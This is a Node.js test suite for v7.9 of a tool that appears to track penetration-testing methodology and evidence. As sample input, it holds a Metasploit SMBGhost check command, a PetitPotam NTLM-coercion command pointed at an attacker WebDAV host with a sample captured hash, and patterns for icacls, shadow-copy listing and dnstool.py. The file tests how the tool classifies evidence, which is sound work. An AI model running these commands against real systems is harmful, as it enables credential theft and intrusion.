'use strict';
const assert=require('assert'),fs=require('fs'),vm=require('vm'),path=require('path'),cp=require('child_process');
const root=path.join(__dirname,'..');
const {loadCurrent}=require(path.join(root,'tools','current-runtime.js'));
const {C,lanes}=loadCurrent(root);const O=global.OBOL_ORANGE_AD_2025_03,F=global.OBOL_ORANGE_FIDELITY_V64,M=global.OBOL_METHODOLOGY_V79,P=global.OBOL_PROJECT_V79;
let passed=0;function test(n,f){try{f();console.log('ok - '+n);passed++;}catch(e){console.error('FAIL - '+n);throw e;}}
function card(id){for(const l of lanes)for(const c of l.cards||[])if(c.id===id)return c;return null;}
function section(key){for(const f of O.files||[])for(const s of f.sections||[])if(s.key===key)return s;return null;}
function unit(id){return (F.units||[]).find(x=>x.id===id);}
function run(file){vm.runInThisContext(fs.readFileSync(file,'utf8'),{filename:file});}
function hasRun(id,re){const c=card(id);return !!(c&&(c.commands||[]).some(x=>re.test(String(x.run||''))));}

test('v7.9 initializes the stable current project model',()=>{const s=C.newState(),p=C.currentProjectModel(s,lanes);assert.strictEqual(C.VERSION,'7.9.0');assert.strictEqual(s.obolVersion,'7.9.0');assert.strictEqual(C.currentProjectModel,C.projectModel79);assert.strictEqual(C.currentNorthStarDashboard,C.northStarDashboard79);assert.strictEqual(p.release,'v7.9');assert.deepStrictEqual([p.canonical.implemented,p.canonical.partial,p.canonical.gap,p.canonical.stale,p.canonical.completePct,p.canonical.representedPct],[124,3,0,0,98,100]);});

test('v7.9 adds three modeled low_access.md source units',()=>{assert.deepStrictEqual(P.sourceWave.delivered,['low-access.local-exploit-smbghost','low-access.local-exploit-serioussam','low-access.webdav-coercion']);for(const id of P.sourceWave.delivered){const u=unit(id);assert(u,id);assert.strictEqual(u.sourceFile,'low_access.md',id);assert.strictEqual(u.auditStatus,'modeled',id);assert.strictEqual(u.auditedIn,'7.9',id);assert((F.dimensions||[]).every(d=>u.review[d.id]===true),id);}const f=C.sourceFidelity79(lanes);assert.deepStrictEqual([f.files.atomized,f.files.total,f.partialBaseline.atomized,f.partialBaseline.total,f.complete,f.total,f.pending],[9,17,31,34,190,190,0]);assert.strictEqual(f.completePct,100);});

test('only the frozen local-exploit and WebDAV parents advance',()=>{assert.deepStrictEqual(P.sourceWave.canonicalAdvanced,['low_access.local-exploit','low_access.webdav']);for(const key of P.sourceWave.canonicalAdvanced){const s=section(key);assert(s,key);assert.strictEqual(s.status,'implemented',key);assert.strictEqual(s.advancedIn,'7.9',key);assert.strictEqual(s.sourceDepthAudit62.status,'modeled',key);}assert.strictEqual((F.atomizedFiles||[]).includes('low_access.md'),false);});

test('Build Next removes the completed low-access baselines and leaves three source-inventory rows',()=>{const q=C.buildNext79(lanes);assert.deepStrictEqual([q.implementedQuality,q.mappedDelivery,q.canonicalGaps,q.sourceFidelity,q.sourceInventory,q.total],[0,0,0,0,3,3]);assert.strictEqual(q.rows.length,3);assert(q.rows.every(x=>x.kind==='source-depth-inventory'));assert(!q.rows.some(x=>x.key==='low_access.webdav'||x.key==='low_access.local-exploit'));});

test('low-access cards expose practical run contracts, cleanup, lineage, and reporting',()=>{for(const id of M.cardIds){const c=card(id);assert(c,id);assert(c.commands&&c.commands.length,id);assert(c.orange43&&c.orange43.some(x=>String(x.key).startsWith('low_access.')),id);assert(c.evidence45&&c.evidence45.source==='v7.9',id);assert((c.report47&&c.report47.evidenceProfile)||c.report,id);assert(c.executionContext79,id);}assert(hasRun('windows-local-exploit-79',/cve_2020_0796_smbghost/));assert(hasRun('windows-local-exploit-79',/icacls/));assert(hasRun('windows-local-exploit-79',/vssadmin list shadows/));assert(hasRun('webdav-coercion-79',/dnstool\.py/));assert(hasRun('webdav-coercion-79',/searchConnector-ms/));assert(hasRun('webdav-coercion-79',/petitpotam\.py/));for(const id of P.sourceWave.delivered){const u=unit(id);for(const owner of u.ownerCardIds||[]){const c=card(owner);assert(c,owner+' owner for '+id);assert((c.atomic79||[]).includes(id),owner+' lineage for '+id);}}});

test('v7.9 Evidence keeps vulnerability, coercion, inbound auth, access, and privilege separate',()=>{const saved=global.OBOL_INTAKE_V78;global.OBOL_INTAKE_V78={analyzeTerminal:()=>({activities:[],segments:[]})};run(path.join(root,'assets','intake-v7.9.js'));const I=global.OBOL_INTAKE_V79;let p=I.proof79('windows-local-exploit-79','msfconsole -q -x "use exploit/windows/smb/cve_2020_0796_smbghost; check"','[+] 10.0.0.10:445 - The target appears to be vulnerable.');assert.strictEqual(p.success,true);assert.deepStrictEqual(p.facts,[]);p=I.proof79('webdav-coercion-79','python3 petitpotam.py -u alice -p pass -d corp attacker@80/random.txt 10.0.0.10','NTLMv2-SSP Hash : CORP\\ALICE::CORP:1122334455667788:AABBCCDDEEFF0011');assert.deepStrictEqual(p.facts,['credential.candidate']);for(const x of ['relay.success','credential.available','access.admin','access.system','remote.execution','objective.domain_admin','capability.dcsync'])assert(!p.facts.includes(x));global.OBOL_INTAKE_V78=saved;});

test('project model exposes the v7.9 source wave and stable consolidated pointers',()=>{const p=C.currentProjectModel(C.newState(),lanes);assert.deepStrictEqual([p.source.atomicComplete,p.source.atomicTotal,p.source.atomicPending,p.source.filesAtomized,p.source.baselinesAtomized,p.buildNext.total],[190,190,0,9,31,3]);assert.strictEqual(p.phase.id,'source-inventory-decomposition');assert.strictEqual(p.recent[0].release,'v7.9');assert(p.details.sourceWave79);});

test('README generator remains structurally synchronized with the current model',()=>{const out=cp.execFileSync(process.execPath,[path.join(root,'tools','sync-readme-build-next.js'),'--print'],{encoding:'utf8'});assert(out.includes('<!-- OBOL-BUILD-NEXT:START -->'));assert(out.includes('**Current live queue:** 3 items'));assert(out.includes('**Canonical methodology:** 124/127'));assert(out.includes('**Orange source fidelity:** 9/17 source files atomized, 31/34 partial baselines decomposed, 190/190'));});

test('release quality gate remains clean',()=>{const r=cp.spawnSync(process.execPath,[path.join(root,'tools','validate-release-quality.js')],{cwd:root,encoding:'utf8'});assert.strictEqual(r.status,0,r.stderr||r.stdout);assert((r.stdout||'').includes('0 implemented-quality repairs, 0 mapped-delivery repairs, 0 canonical gaps'));});

test('repository release contract passes for v7.9',()=>{const r=cp.spawnSync(process.execPath,[path.join(root,'tools','validate-release-pr.js'),'--repo-only'],{cwd:root,encoding:'utf8'});assert.strictEqual(r.status,0,r.stderr||r.stdout);});

test('v7.9 release wiring is complete and delta-based',()=>{const idx=fs.readFileSync(path.join(root,'index.html'),'utf8'),readme=fs.readFileSync(path.join(root,'README.md'),'utf8'),releaseDoc=fs.readFileSync(path.join(root,'docs','v7.9.md'),'utf8'),runtime=fs.readFileSync(path.join(root,'tools','current-runtime.js'),'utf8');for(const x of ['orange-fidelity-v7.9.js','methodology-v7.9.js','project-model-v7.9.js','core-v7.9.js','intake-v7.9.js','app-v7.9.js','obol-v7.9.css'])assert(idx.includes(x),x);assert(runtime.includes('orange-fidelity-v7.9.js'));assert(runtime.includes('methodology-v7.9.js'));assert(runtime.includes('project-model-v7.9.js'));assert(runtime.includes('core-v7.9.js'));assert(!idx.includes('dashboard-v7.9.js'));assert(readme.includes('Current release: **v7.9**'));assert(releaseDoc.includes('# Obol v7.9'));});

test('sanitized export advances to v7.9 while retaining secret redaction',()=>{const s=C.newState();C.addTypedArtifact(s,'secrets','DoNotExport!',{});const safe=C.sanitizedCopy(s);assert.strictEqual(safe.obolVersion,'7.9.0');assert.strictEqual(safe.typedArtifacts.secrets[0].value,'[REDACTED SECRET]');});

console.log(`\n${passed} v7.9 tests passed`);
